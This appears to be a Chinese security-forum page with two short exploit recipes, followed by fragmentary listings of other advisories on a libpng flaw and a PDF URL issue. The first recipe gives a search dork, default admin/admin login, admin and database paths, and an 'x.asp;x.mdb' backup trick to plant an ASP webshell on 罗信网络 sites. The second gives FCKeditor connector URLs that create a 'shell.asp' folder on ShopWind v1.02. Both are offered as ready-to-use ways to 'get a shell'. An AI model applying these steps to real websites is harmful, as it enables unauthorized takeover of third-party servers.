ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
所属分类:
网络安全 / 漏洞分析
阅读数:
86
收藏 0赞 0分享
罗信网络建站系统oDAY
百度 or google "技术支持:罗信网络"
后台地址: site+lx
数据库地址: site+lx+databases+主域名.asp(需要猜测)
帐号&密码: admin admin
下来就是拿shell
重要部分: 上传jpg格式的asp马
数据库备份,请注意,这里只能备份后缀为mdb格式的.
那我们怎么备份呢?
还记得之前x.asp;x.jpg格式吗?
对 我们依靠这个 备份格式为: x.asp;x.mdb
OK之后访问我们的备份shell
在线编辑器: site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释:官方未修补
====================YD分界线====================
ShopWind网店系统 v1.02 上传漏洞
Author:Lan3a
这个程序用的是FCKeditor 编辑器
利用2003的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
解析PNG图象格式库存在远程拒绝服务漏洞
受影响系统:
libpng libpng <= 1.2.20
不受影响系统:
libpng libpng 1.2.21
描述:
-------------------------------------------
收藏 0赞 0分享
URL解析漏洞在PDF文档中的利用
右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。
在http://seclists.org/fulldisclosure/2007/Oct/0068.html看到这个漏洞的时候,
收藏 0赞 0分享
查看更多